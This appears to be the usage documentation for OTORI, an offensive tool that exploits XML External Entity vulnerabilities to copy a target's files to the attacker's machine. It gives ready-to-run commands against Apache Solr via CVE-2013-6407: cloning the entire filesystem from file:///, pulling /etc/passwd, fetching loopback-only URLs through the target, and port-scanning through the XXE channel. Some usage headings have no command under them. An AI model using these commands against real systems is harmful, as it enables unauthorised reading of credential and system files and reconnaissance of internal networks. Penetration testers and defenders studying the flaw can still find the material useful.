This tool is designed to exploit XML External Entity vulnerabilities by cloning as much of the target host's filesystem as possible to the system running OTORI. It depends entirely on custom modules for given vulnerabilities. See the documentation at http://www.beneaththewaves.net/Software/ for details.

Usage:

List available modules:

python ./otori.py --list


Get details about a particular module:

python ./otori.py --details "MODULENAME"
    

Clone target filesystem (in whole or in part):

python ./otori.py --clone --module "MODULENAME" --host "TARGET_HOST" --port "TARGET_PORT" --uristem "TARGET_URI_STEM" [--ssl] ([--singleuri "REQUESTED_URI"] OR [--rooturi "REQUESTED_ROOT_URI"] OR [--rooturilist "PATH_TO_LIST"] OR [--exacturilist "PATH_TO_LIST"]) --outputbase "BASE_OUTPUT_PATH" [--maxdepth N] [--retries N]


Perform a very basic port-scan and store any banners/default pages returned:


Act as an extremely basic HTTP proxy via the XXE channel (only GET requests supported):
[--storeallresults --outputbase "BASE_OUTPUT_PATH"] [--getforallmethods]


----------------------------------

Examples:


Get detailed information about the "CVE-2013-6407-DAH" module:

python ./otori.py --details "CVE-2013-6407-DAH"


Using the CVE-2013-6407 vulnerability (document analysis handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, download all possible files, with the recreated directory structure being based in the local directory /home/blincoln/cloned/solr-10.1.2.3/

python ./otori.py --clone --module "CVE-2013-6407-DAH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/analysis/document" --rooturi "file:///" --outputbase "/home/blincoln/cloned/solr-10.1.2.3/"


Using the CVE-2013-6407 vulnerability (update request handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, download the /etc/passwd file to the local directory /home/blincoln/cloned/solr-10.1.2.3/

python ./otori.py --clone --module "CVE-2013-6407-URH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/update" --rooturi "file:///etc/passwd" --outputbase "/home/blincoln/cloned/solr-10.1.2.3/"


Using the CVE-2013-6407 vulnerability (update request handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, attempt to access robots.txt using the loopback address of the target system, then store it in the local directory /home/blincoln/cloned/solr-10.1.2.3-loopback-80/

python ./otori.py --clone --module "CVE-2013-6407-URH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/update" --singleuri "http://127.0.0.1/robots.txt" --outputbase "/home/blincoln/cloned/solr-10.1.2.3-loopback-80/"


Using the CVE-2013-6407 vulnerability (document analysis handler variation) in Apache Solr hosted on a Unix/Linux system with the URL http://10.1.2.3:8983/solr, perform a quasi-portscan, with the recreated directory structure being based in the local directory /home/blincoln/cloned/solr-10.1.2.3/

python ./otori.py --clone --module "CVE-2013-6407-DAH" --host "10.1.2.3" --port 8983 --baseuristem "/solr/analysis/document" --rooturilist "data/tcp_portscan-top_100.txt" --outputbase "/home/blincoln/cloned/solr-10.1.2.3-portscan/"
